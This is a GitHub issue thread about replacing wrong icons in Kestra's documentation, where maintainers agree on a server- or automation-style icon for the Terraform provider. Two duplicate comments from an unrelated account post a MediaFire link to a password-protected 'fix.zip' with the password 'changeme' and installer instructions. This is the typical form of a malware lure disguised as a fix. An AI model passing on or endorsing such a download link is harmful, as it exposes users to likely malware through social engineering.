### ISSUE TITLE
Fix wrong icons

### ISSUE THREAD

**Issue by anna-geller** [kestra-io/docs#1668]
### Description

![image](https://github.com/user-attachments/assets/bba0d551-3682-4720-91ce-0f14ad078d04)

**Comment by Nico-Kestra** [comment]
<img width="909" alt="Capture d’écran 2024-08-26 à 13 56 01" src="https://github.com/user-attachments/assets/8d489f6e-4d1d-4365-867d-e9275e555652">
like this?

https://www.figma.com/design/g8Di3M1gbajOjOqp0ZrzXO/02_Kestra.io?node-id=10977-109845&t=EiAHPsbbRg1vhsoi-1

**Comment by anna-geller** [comment]
yes, only the Terraform provider should get some icon like: server, automation, code - not humans/users

**Comment by xiaobai-marker** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by xiaobai-marker** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by anna-geller** [comment]
done https://github.com/kestra-io/docs/pull/1670
